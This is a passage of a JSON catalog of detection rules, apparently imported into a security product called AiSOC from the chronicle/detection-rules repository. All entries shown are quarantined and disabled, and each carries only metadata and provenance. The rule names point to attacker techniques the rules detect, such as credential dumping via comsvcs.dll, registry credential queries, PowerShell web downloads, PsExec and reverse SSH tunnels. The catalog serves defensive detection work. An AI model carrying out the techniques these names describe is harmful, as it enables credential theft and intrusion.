"Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/powershell_rundll32_remote_thread_creation.yaral" } }, { "id": "chronicle-detection-rules-powershell-script-run-in-appdata", "type": "detection", "name": "powershell_script_run_in_appdata", "description": "powershell_script_run_in_appdata", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-script-run-in-appdata.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_script_run_in_appdata", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/powershell_script_run_in_appdata.yaral" } }, { "id": "chronicle-detection-rules-powershell-web-download", "type": "detection", "name": "powershell_web_download", "description": "powershell_web_download", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-web-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_web_download", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/powershell_web_download.yaral" } }, { "id": "chronicle-detection-rules-printbrm-zip-creation-or-extraction", "type": "detection", "name": "printbrm_zip_creation_or_extraction", "description": "printbrm_zip_creation_or_extraction", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/printbrm-zip-creation-or-extraction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "printbrm_zip_creation_or_extraction", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/printbrm_zip_creation_or_extraction.yaral" } }, { "id": "chronicle-detection-rules-process-dump-via-comsvcs-dll", "type": "detection", "name": "process_dump_via_comsvcs_dll", "description": "process_dump_via_comsvcs_dll", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/process-dump-via-comsvcs-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "process_dump_via_comsvcs_dll", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/process_dump_via_comsvcs_dll.yaral" } }, { "id": "chronicle-detection-rules-process-launch-vt-enrichment", "type": "detection", "name": "process_launch_vt_enrichment", "description": "process_launch_vt_enrichment", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/process-launch-vt-enrichment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "process_launch_vt_enrichment", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/process_launch_vt_enrichment.yaral" } }, { "id": "chronicle-detection-rules-process-memory-dump-via-comsvcs-dll", "type": "detection", "name": "process_memory_dump_via_comsvcs_dll", "description": "process_memory_dump_via_comsvcs_dll", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/process-memory-dump-via-comsvcs-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "process_memory_dump_via_comsvcs_dll", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/process_memory_dump_via_comsvcs_dll.yaral" } }, { "id": "chronicle-detection-rules-process-memory-dump-via-rdrleakdiag", "type": "detection", "name": "process_memory_dump_via_rdrleakdiag", "description": "process_memory_dump_via_rdrleakdiag", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/process-memory-dump-via-rdrleakdiag.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "process_memory_dump_via_rdrleakdiag", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/process_memory_dump_via_rdrleakdiag.yaral" } }, { "id": "chronicle-detection-rules-program-executions-in-suspicious-folders", "type": "detection", "name": "program_executions_in_suspicious_folders", "description": "program_executions_in_suspicious_folders", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/program-executions-in-suspicious-folders.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "program_executions_in_suspicious_folders", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/linux/program_executions_in_suspicious_folders.yaral" } }, { "id": "chronicle-detection-rules-psexe-renamed-sysinternals-tool", "type": "detection", "name": "psexe_renamed_sysinternals_tool", "description": "psexe_renamed_sysinternals_tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/psexe-renamed-sysinternals-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "psexe_renamed_sysinternals_tool", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/ps_exe_renamed_sysinternals_tool.yaral" } }, { "id": "chronicle-detection-rules-psexec-detector", "type": "detection", "name": "psexec_detector", "description": "psexec_detector", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/psexec-detector.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "psexec_detector", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/psexec_detector.yaral" } }, { "id": "chronicle-detection-rules-psexec-execution", "type": "detection", "name": "psexec_execution", "description": "psexec_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/psexec-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "psexec_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/psexec_execution.yaral" } }, { "id": "chronicle-detection-rules-psexec-process-has-terminated", "type": "detection", "name": "psexec_process_has_terminated", "description": "psexec_process_has_terminated", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/psexec-process-has-terminated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "psexec_process_has_terminated", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/psexec_process_has_terminated.yaral" } }, { "id": "chronicle-detection-rules-psexec-service-start", "type": "detection", "name": "psexec_service_start", "description": "psexec_service_start", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/psexec-service-start.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "psexec_service_start", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/psexec_service_start.yaral" } }, { "id": "chronicle-detection-rules-psexec-tool-execution", "type": "detection", "name": "psexec_tool_execution", "description": "psexec_tool_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/psexec-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "psexec_tool_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/psexec_tool_execution.yaral" } }, { "id": "chronicle-detection-rules-pua-nimgrab-execution", "type": "detection", "name": "pua_nimgrab_execution", "description": "pua_nimgrab_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/pua-nimgrab-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "pua_nimgrab_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/pua_nimgrab_execution.yaral" } }, { "id": "chronicle-detection-rules-public-cyber-enemy-emotet-has-returned", "type": "detection", "name": "public_cyber_enemy_emotet_has_returned", "description": "public_cyber_enemy_emotet_has_returned", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/public-cyber-enemy-emotet-has-returned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "public_cyber_enemy_emotet_has_returned", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/public_cyber_enemy_emotet_has_returned.yaral" } }, { "id": "chronicle-detection-rules-pulse-secure-attack-cve201911510", "type": "detection", "name": "pulse_secure_attack_cve201911510", "description": "pulse_secure_attack_cve201911510", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/pulse-secure-attack-cve201911510.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "pulse_secure_attack_cve201911510", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/webserver/pulse_secure_attack_cve_2019_11510.yaral" } }, { "id": "chronicle-detection-rules-quarkspwdump-dump-file", "type": "detection", "name": "quarkspwdump_dump_file", "description": "quarkspwdump_dump_file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/quarkspwdump-dump-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "quarkspwdump_dump_file", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/quarkspwdump_dump_file.yaral" } }, { "id": "chronicle-detection-rules-quasar-rat-detector-sysmon", "type": "detection", "name": "quasar_rat_detector_sysmon", "description": "quasar_rat_detector_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/quasar-rat-detector-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "quasar_rat_detector_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/quasar_rat_detector__sysmon.yaral" } }, { "id": "chronicle-detection-rules-query-credentials-in-registry", "type": "detection", "name": "query_credentials_in_registry", "description": "query_credentials_in_registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/query-credentials-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "query_credentials_in_registry", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/query_credentials_in_registry.yaral" } }, { "id": "chronicle-detection-rules-rdp-hijacking-terminal-services-manipulation", "type": "detection", "name": "rdp_hijacking_terminal_services__manipulation", "description": "rdp_hijacking_terminal_services__manipulation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rdp-hijacking-terminal-services-manipulation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rdp_hijacking_terminal_services__manipulation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/rdp_hijacking__terminal_services__manipulation.yaral" } }, { "id": "chronicle-detection-rules-rdp-login-from-localhost", "type": "detection", "name": "rdp_login_from_localhost", "description": "rdp_login_from_localhost", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rdp-login-from-localhost.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rdp_login_from_localhost", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/rdp_login_from_localhost.yaral" } }, { "id": "chronicle-detection-rules-rdp-over-reverse-ssh-tunnel-wfp", "type": "detection", "name": "rdp_over_reverse_ssh_tunnel_wfp", "description": "rdp_over_reverse_ssh_tunnel_wfp", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rdp-over-reverse-ssh-tunnel-wfp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rdp_over_reverse_ssh_tunnel_wfp", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/rdp_over_reverse_ssh_tunnel_wfp.yaral" } }, { "id": "chronicle-detection-rules-rdp-sensitive-settings-changed", "type": "detection", "name": "rdp_sensitive_settings_changed", "description": "rdp_sensitive_settings_changed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rdp-sensitive-settings-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rdp_sensitive_settings_changed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/rdp_sensitive_settings_changed.yaral" } }, { "id": "chronicle-detection-rules-rdp-sensitive-settings-changed-to-zero", "type": "detection", "name": "rdp_sensitive_settings_changed_to_zero", "description": "rdp_sensitive_settings_changed_to_zero", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rdp-sensitive-settings-changed-to-zero.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rdp_sensitive_settings_changed_to_zero", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/rdp_sensitive_settings_changed_to_zero.yaral" } }, { "id": "chronicle-detection-rules-recon-credential-theft-cisa-report", "type": "detection", "name": "recon_credential_theft_cisa_report", "description": "recon_credential_theft_cisa_report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/recon-credential-theft-cisa-report.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "recon_credential_theft_cisa_report", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/recon_credential_theft_cisa_report.yaral" } }, { "id": "chronicle-detection-rules-recon-environment-enumeration-active-directory-cisa-report", "type": "detection", "name": "recon_environment_enumeration_active_directory_cisa_report", "description": "recon_environment_enumeration_active_directory_cisa_report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/recon-environment-enumeration-active-directory-cisa-report.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "recon_environment_enumeration_active_directory_cisa_report", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/recon_environment_enumeration_active_directory_cisa_report.yaral" } }, { "id": "chronicle-detection-rules-recon-environment-enumeration-network-cisa-report", "type": "detection", "name": "recon_environment_enumeration_network_cisa_report", "description": "recon_environment_enumeration_network_cisa_report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/recon-environment-enumeration-network-cisa-report.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "recon_environment_enumeration_network_cisa_report", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/recon_environment_enumeration_network_cisa_report.yaral" } }, { "id": "chronicle-detection-rules-recon-environment-enumeration-system-cisa-report", "type": "detection", "name": "recon_environment_enumeration_system_cisa_report", "description": "recon_environment_enumeration_system_cisa_report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/recon-environment-enumeration-system-cisa-report.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "recon_environment_enumeration_system_cisa_report", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/recon_environment_enumeration_system_cisa_report.yaral" } }, { "id": "chronicle-detection-rules-recon-successful-logon-enumeration-powershell-t1033-cisa-report", "type": "detection", "name": "recon_successful_logon_enumeration_powershell_T1033_cisa_report", "description": "recon_successful_logon_enumeration_powershell_T1033_cisa_report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/recon-successful-logon-enumeration-powershell-t1033-cisa-report.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "recon_successful_logon_enumeration_powershell_T1033_cisa_report", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/recon_successful_logon_enumeration_powershell_T1033_cisa_report.yaral" } }, { "id": "chronicle-detection-rules-recon-suspicious-commands-cisa-report", "type": "detection", "name": "recon_suspicious_commands_cisa_report", "description": "recon_suspicious_commands_cisa_report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/recon-suspicious-commands-cisa-report.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "recon_suspicious_commands_cisa_report", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/recon_suspicious_commands_cisa_report.yaral" } }, { "id": "chronicle-detection-rules-reg-add-suspicious-paths", "type": "detection", "name": "reg_add_suspicious_paths", "description": "reg_add_suspicious_paths", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/reg-add-suspicious-paths.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "reg_add_suspicious_paths", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/reg_add_suspicious_paths.yaral" } }, { "id": "chronicle-detection-rules-registry-explorer-tool-detector", "type": "detection", "name": "registry_explorer_tool_detector", "description": "registry_explorer_tool_detector", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/registry-explorer-tool-detector.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "registry_explorer_tool_detector", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/registry_explorer_tool_detector.yaral" } }, { "id": "chronicle-detection-rules-registry-persistence-mechanisms", "type": "detection", "name": "registry_persistence_mechanisms", "description": "registry_persistence_mechanisms", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/registry-persistence-mechanisms.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "registry_persistence_mechanisms", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/registry_persistence_mechanisms.yaral" } }, { "id": "chronicle-detection-rules-registry-persistence-via-explorer-run-key", 